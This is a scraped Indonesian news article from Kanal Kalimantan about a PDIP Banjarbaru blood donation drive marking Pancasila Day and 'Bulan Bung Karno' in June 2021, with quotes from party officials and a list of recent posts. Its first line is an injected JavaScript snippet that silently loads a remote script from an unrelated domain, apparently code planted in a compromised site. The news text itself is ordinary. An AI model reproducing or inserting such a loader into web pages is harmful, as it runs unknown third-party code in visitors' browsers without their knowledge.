(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Peringatan ‘Bulan Bung Karno’, DPC PDIP Banjarbaru Gelar Kegiatan Donor Darah


KANALKALIMANTAN.COM, BANJARBARU – Bertepatan dengan hari lahir Pancasila, DPC PDIP Kota Banjarbaru melalui tim Badan Penanggulangan Bencana (Baguna) menggelar aksi donor darah, Selasa (1/6/2021). Kegiatan ini merupakan salah satu rangkaian acara yang diselenggarakan partai besutan Megawati sepanjang Juni ini yang diperingati sebagai bulan Bung Karno.

Ketua DPC PDIP Banjarbaru, Wartono, yang dalam hal ini diwakili Sekretaris Windi Novianto, mengungkapkan bahwa bulan Juni disebut sebagai bulan Bung Karno karena adanya tiga peristiwa bersejarah berkaitan dengan sosok sang proklamator.

“Juni menjadi bulan Bung Karno karena tepat pada tanggal 1 Juni, Bung Karno mendeklarasikan hari kelahiran Pancasila. Lalu tanggal 6 Juni 1901 adalah hari kelahiran Bung Karno sendiri dan pada 21 Juni 1970 Bung Karno wafat,” ujarnya.

Baca juga: Deklarasi KKIPP untuk Kemerdekaan Palestina dan Kemanusiaan

Adapun selama peringatan bulan Bung Karno, ujar Windi, DPC PDIP Banjarbaru telah mengagendakan berbagai macam kegiatan. Mulai dari pelaksanaan donor darah, lomba puisi, lomba memancing, hingga talkshow yang membahas gagasan dan pemikiran sosok Presiden RI pertama tersebut.

“Sebagaimana instruksi ibu Megawati, kami melaksanakan berbagai kegiatan-kegiatan bermanfaat dan sosial di tengah masyarakat, full selama satu bulan ini. Semoga pelaksanaannya nanti bisa berjalan lancar,” lanjutnya.

Pada pelaksanaan aksi donor darah hari ini, DPC PDIP Banjarbaru menargetkan 50 kantong darah yang terkumpul. Kegiatan diikuti oleh kalangan masyarakat umum dan pejabat pemerintahan, dengan melibatkan lembaga Palang Merah Indonesia (PMI).

Menurut Ketua Baguna PDIP Banjarbaru, Didi I Mujaddidi, selaku ketua pelaksana kegiatan, dilaksanakannya aksi donor darah dipicu atas kondisi kota Banjarbaru yang kerap kali kekurangan stok darah. Bahkan diakuinya, kegiatan ini bukan kali pertama yang diselenggarakan.

“Kita menyadari bahwa sering kali stok darah di tempat kita ini kekurangan. Untuk itu kami pikir kegiatan ini sangat bermanfaat. Ini sudah kali kedua kami melaksanakan kegiatan donor darah. Pesertanya sendiri melibatkan seluruh masyarakat Banjarbaru,”

Di sisi lain, Wakil Ketua DPD PDIP Kalsel, Mardian, mengapresiasi seluruh kegiatan yang dilaksanakan DPC PDIP Banjarbaru. Ia juga menegaskan bahwa di level DPD, pihaknya juga akan terus membantu pelaksanaan kegiatan. “Kami di DPD PDIP Kalsel akan terus memback up kegiatan seperti ini, khususnya yang bersifat sosial. Kami sangat konsen dengan kegiatan ini dan sangat kami apresiasi,” imbuhnya.

Baca juga: Peringati Hari Lahir Pancasila, Ini Pesan Wali Kota Banjarbaru Aditya Mufti Ariffin

Tak hanya itu, Ketua Komisi I DPRD Banjarbaru, Herry Budiman, juga berpesan agar peringatan Bulan Bung Karno yang juga bertepatan dengan hari lahir Pancasila agar dimaknai secara seksama oleh masyarakat maupun kader partai berlambang Banteng. Khusunya generasi milenial saat ini.

“Kita hari ini juga memperingati hari lahir Pancasila. Ini menjadi misi kita untuk menumbuhkan edukasi bukan hanya tentang sosial. Generasi harus mewarnai nilai Pancasila. Ini harus dilestarikan. Apalagi saat ini banyak rong-rongan yang ingin menghancurkan Pancasila. Sudah menjadi tugas kita untuk melestarikan nilai-nilai leluhur Pancasila,” tuntasnya. (Kanalkalimantan.com/dewi)

Reporter: dewi
Editor: cell


Al Ghifari

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

9 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

10 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

10 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

10 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

11 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

11 jam ago

This website uses cookies.